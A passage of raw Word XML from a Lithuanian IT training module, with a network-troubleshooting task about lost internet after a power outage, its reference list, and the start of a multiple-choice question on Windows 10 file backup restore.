        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>notification subscription</w:t>
      </w:r>
      <w:r w:rsidR="674277D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. (2020, gruodžio 23). </w:t>
      </w:r>
      <w:r w:rsidR="674277D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidR="674277D9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidR="7EE8A2B7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://docs.microsoft.com/en-us/system-center/scsm/notifications?view=sc-sm-2019#to-create-a-periodic-notification-subscription-for-a-release-record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0740C7" w14:textId="39B0BF61" w:rsidR="4C1A0010" w:rsidRPr="005A5C28" w:rsidRDefault="4C1A0010" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD73257" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00630AE8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>9 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> NUSTATYTI INFORMACINĖS SISTEMOS PROGRAMINĮ GEDIMĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B695476" w14:textId="7D027EF4" w:rsidR="00630AE8" w:rsidRPr="005A5C28" w:rsidRDefault="00630AE8" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA: Įmon</w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ėje</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, turinč</w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ioje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00593BD0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>savo</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IS infrastruktūr</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0061226A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vienai valandai</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0A9B4FE5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sutriko</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> elektr</w:t>
      </w:r>
      <w:r w:rsidR="1EA25179" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>os tiekimas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Po</w:t>
      </w:r>
      <w:r w:rsidR="0061226A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to, kai</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tiekimas </w:t>
      </w:r>
      <w:r w:rsidR="0061226A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>buvo atnaujintas,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>paaiškėjo, kad</w:t>
      </w:r>
      <w:r w:rsidR="0061226A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> įmonėje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">sutriko interneto ryšys, nors visa tinklo įranga serverinėje patalpoje </w:t>
      </w:r>
      <w:r w:rsidR="00780D15" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>veiki</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a. Kaip at</w:t>
      </w:r>
      <w:r w:rsidR="0061226A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nauji</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nsite</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interneto ryšio veikimą</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> įmonėje</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>? Pateik</w:t>
      </w:r>
      <w:r w:rsidR="00233D97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ite glaustą</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>atsakymą ir galimus gedimų</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> šalinimų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sprendimus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258D4553" w14:textId="7A3ABB62" w:rsidR="00EE47A3" w:rsidRPr="005A5C28" w:rsidRDefault="00EE47A3" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="407E6B9D" w14:textId="0ABD91C1" w:rsidR="33C344B9" w:rsidRPr="005A5C28" w:rsidRDefault="2A12B61F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D1207E" w14:textId="7446DA03" w:rsidR="71BA19CB" w:rsidRPr="005A5C28" w:rsidRDefault="625FE9E6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Lost Configuration on Power Outage </w:t>
      </w:r>
      <w:r w:rsidR="15D4A9D2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2020, liepos 25). </w:t>
      </w:r>
      <w:r w:rsidR="04411969" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cisco Community.</w:t>
      </w:r>
      <w:r w:rsidR="04411969" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5ED990E2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:r w:rsidR="463C4C7D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>https://community.cisco.com/t5/network-security/lost-configuration-on-power-outage/m-p/4125896</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F17C60" w14:textId="4FFBEFA2" w:rsidR="33C344B9" w:rsidRPr="005A5C28" w:rsidRDefault="051B1AD6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Router wifi settings gone after power outage (</w:t>
      </w:r>
      <w:r w:rsidR="39687971" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2018, lapkričio 21).</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="39687971" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Netgear</w:t>
      </w:r>
      <w:r w:rsidR="04411969" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Community.</w:t>
      </w:r>
      <w:r w:rsidR="04411969" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId81">
        <w:r w:rsidR="2A12B61F" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://community.netgear.com/t5/Nighthawk-WiFi-Routers/Router-wifi-settings-gone-after-power-outage/td-p/1667153</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F393A02" w14:textId="4ED9835F" w:rsidR="0F18B819" w:rsidRPr="005A5C28" w:rsidRDefault="207ACD78" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>RV340 lost his configuration after power outage</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="539DACD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2020, birželio 6). </w:t>
      </w:r>
      <w:r w:rsidR="04411969" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cisco Community.</w:t>
      </w:r>
      <w:r w:rsidR="04411969" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId82">
        <w:r w:rsidR="12CA8DC9" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://community.cisco.com/t5/routing/rv340-lost-his-configuration-after-power-outage/td-p/4097598</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54FB5FD9" w14:textId="1B408F64" w:rsidR="1ABD96F0" w:rsidRPr="005A5C28" w:rsidRDefault="28B9D61E" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Why lose a router settings after a power outage? (</w:t>
      </w:r>
      <w:r w:rsidR="0CCF9D7C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2012 rugsėjo 19). </w:t>
      </w:r>
      <w:r w:rsidR="04411969" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cisco Community.</w:t>
      </w:r>
      <w:r w:rsidR="04411969" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:r w:rsidR="32BEEE69" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>https://community.cisco.com/t5/routing/why-lose-a-router-settings-after-a-power-outage/td-p/2018457</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34025EFE" w14:textId="742AFFB6" w:rsidR="1ABD96F0" w:rsidRPr="005A5C28" w:rsidRDefault="2EDAF960" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Impact of frequent power outtage to Catalyst switches</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2004, spalio 14). </w:t>
      </w:r>
      <w:r w:rsidR="61A4A4CB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cisco Community.</w:t>
      </w:r>
      <w:r w:rsidR="61A4A4CB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId83">
        <w:r w:rsidR="350428FD" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://community.cisco.com/t5/other-network-architecture/impact-of-frequent-power-outtage-to-catalyst-switches/td-p/360510</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="508808BA" w14:textId="1CEEC1C8" w:rsidR="01576417" w:rsidRPr="005A5C28" w:rsidRDefault="01576417" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D2A332" w14:textId="643A495A" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="216CB58E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="5603086B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="5603086B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TESTAS, SKIRTAS ĮSIVERTINTI MODULIO TEORINIŲ ŽINIŲ GEBĖJIMUS</w:t>
      </w:r>
      <w:r w:rsidR="0023391F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1FD4FB" w14:textId="77777777" w:rsidR="00BB13CE" w:rsidRPr="005A5C28" w:rsidRDefault="00BB13CE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F31BC1" w14:textId="6C908085" w:rsidR="6ACD6CA6" w:rsidRPr="005A5C28" w:rsidRDefault="005D53E4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00883A9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0000007D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kaip vykdyti failų kopijų atkūrimą naudojantis Windows 10 įrankiu?</w:t>
      </w:r>
      <w:r w:rsidR="00593BD0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Perskaitykite instrukciją ir</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ažymėkite teisingą veiksmų aprašymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4585AB97" w14:textId="371A8336" w:rsidR="6ACD6CA6" w:rsidRPr="005A5C28" w:rsidRDefault="7AA0694E"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A) Paspausdami klaviatūros „Windows“ logotipo klavišą</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">+ W atidarykite langą </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Parametrai.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jei nepavyko, pasirinkite mygtuką </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pradžia</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
